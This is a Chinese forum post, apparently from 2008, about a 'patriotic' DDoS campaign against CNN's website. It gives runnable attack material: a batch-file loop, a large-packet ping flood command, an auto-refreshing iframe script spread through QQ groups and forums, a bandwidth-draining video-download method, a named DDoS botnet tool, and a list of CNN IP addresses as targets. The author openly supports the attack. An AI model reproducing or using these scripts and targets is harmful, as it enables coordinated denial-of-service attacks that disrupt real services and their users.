全民红客
近期,CNN主播卡弗蒂对于中国人民带有强烈歧视性的言论,以及CNN对于这一事件缺乏诚意的道歉和对于中国政府的无端指责,激起了全国人民的强烈愤慨。于是在一些爱国技术人员的倡议下,广大网民发起了一场针对CNN官方网站的攻击行动。下面,笔者从技术的角度对这次攻击中采用的攻击方法进行解析。<P> <STRONG>一、攻击技术</STRONG></P>
<P> 这次攻击采用的是DDOS攻击方法,即英语“Distributed Denial of Service”的缩写。顾名思义,即是利用网络中的无数计算机,向某一特定的目标计算机发动密集式的“拒绝服务”要求,从而把目标计算机的网络资源及系统资源耗尽。这是一种最有效而且难以有效防范的攻击技术。</P>
<P> <STRONG>1.手动攻击</STRONG></P>
<P> 在浏览器的地址栏中输入CNN的网站地址http://www.cnn.com,频繁登录访问其网站。其实这算不上攻击,但是当有数以万计的人同时登录时同样会耗费其网络带宽、系统资源,造成网络拥堵。</P>
<P> <STRONG>2.批处理脚本</STRONG></P>
<P> 把以下代码保存为一个.bat文件,比如cnn.bat,然后直接双击运行即可。</P>
<P>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#f3f3f3> @echo off <BR> :test <BR> taskkill /f /im iexplore.exe <BR> start http://www.cnn.com <BR> sleep 2 <BR> goto test</TD></TR></P>
<P> 解释:每隔1秒钟关闭IE进程,循环访问http://www.cnn.com。比上面的手动攻击更方便,但是IE窗口关闭又开启影响正常工作,适用于电脑闲置时。(图1)</P>
<P> </P>
<P align=center><IMG height=323 alt=批处理攻击 src="/bbs/attachments/computer/20081204/200812510143979677801.jpg" width=500 twffan="done"></P>
<P> <STRONG>3.ping攻击</STRONG></P>
<P> 在命令行(cmd.exe)中输入如下命令:</P>
<P> ping www.cnn.com -t -l 65500</P>
<P> 解释:持续不断向www.cnn.com发送65500字节的数据包,当然只有一台机器发送没有效果,当数以万计的机子发送的时候才见威力。(图2)</P>
<P align=center><IMG height=192 alt=洪水攻击 src="/bbs/attachments/computer/20081204/200812510143984377802.jpg" width=500 twffan="done"></P>
<P> <STRONG>4.脚本攻击</STRONG></P>
<P> 网友在QQ群、论坛、百度贴吧等其它地方发布如下网页代码,把它保存为cnn.htm文件,然后双击打开即可。</P>
<P>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#f3f3f3><iframe id="cnn" width="100%" height="100" ></iframe> <BR><script> <BR>var e=document.getElementById('cnn'); <BR>setInterval("e.src='http://www.cnn.com'",3000); <BR></script></TD></TR></P>
<P> 解释:在网页中嵌入一个框架,每隔3000毫秒打开CNN的网站。不用人工参与,也不影响正常工作。</P>
<P> 另外,有些网友做好了攻击网页,以链接的形式在论坛或者QQ群等地方发布出来,大家只需点击即可。比如:</P>
<P> http://www.test.com/cnn.htm</P>
<P> 其cnn.htm页面的核心代码也就是上面的网页脚本代码。(图3) </P>
<P align=center><IMG height=425 alt=cnn.htm页面的核心代码也就是上面的网页脚本代码 src="/bbs/attachments/computer/20081204/200812510143989077803.jpg" width=483 twffan="done"></P>
<P align=center></p><p align='center'><b> 下一页 </b></p> <
</P>
<P><STRONG>4.下载攻击</STRONG></P>
<P> 登陆CNN网站的“http://edition.cnn.com/video/”页面,看到看到类似的链接</P>
<P> java script:cnnVideo('play', '/video/politics/2006/03/01/henry.port.politics.wed.cnn')</P>
<P> 只用把文件的头和尾改一下即可。最后下载文件的地址是</P>
<P> mms: //wmscnn.stream.aol.com/cnn/politics/2006/03/01/henry.port.politics.wed.cnn.ws.wmv</P>
<P> 随便用一下可以下mms格式的工具把它下下来即可。</P>
<P> 或者是类似这样的链接,用下载工具下载</P>
<P> http://i.cdn.turner.com/cnn/.element/js/2.0/video/xmp/FlashMediaPlayer_0_1_524_1663.swf</P>
<P> 视频下载肯定会占用大量的带宽,从而造成网络的拥堵。</P>
<P> <STRONG>5.工具攻击</STRONG></P>
<P> 利用类似上兴网络僵尸这样的DDOS工具,组织大量的主机进行集中的攻击。这些工具的操作非常简单,只需要输入攻击的IP和端口(本例中的80)即可。网友也公布了CNN的一些动态IP地址。(图4)</P>
<P align=center><IMG height=273 alt=DDOS攻击工具 src="/bbs/attachments/computer/20081204/200812510143993777804.jpg" width=446 twffan="done"></P>
<P> 64.236.29.120、61.236.16.52、61.236.16.20 、61.236.91.24 、61.236.91.23、61.236.91.22</P>
<P> 61.236.91.21 、61.236.29.120 、61.236.24.12 、61.236.22.112</P>
<P> <STRONG>二、攻击效果</STRONG></P>
<P> 这两天的攻击效果比较明显,CNN的网站一度无法浏览,如图5所示。来自CNN官方的消息称:CNN网站遭到攻击,浏览其新闻网页受到干扰,导致亚洲部分地区的网速变慢很多。(图5)</P>
<P align=center><IMG height=443 alt=攻击效果 src="/bbs/attachments/computer/20081204/200812510143998477805.jpg" width=500 twffan="done"></P>
<P> 由于CNN采取了动态IP和负载均衡技术,这一轮的攻击只是造成了亚洲地区的访问堵塞,其他地方仍然可以访问。因此,预计新一轮的攻击会通过国外代理,然后实施攻击。</P>
<P> <STRONG>总结:</STRONG>笔者只是从技术的角度进行解析,对于广大网民攻击CNN网站的行动不予以评论。但毫不隐讳自己对广大网民爱国行为的强烈支持,以及对CNN的强烈愤慨。</P></p><p align='center'><b>上一页 </b></p> <
页:
[1]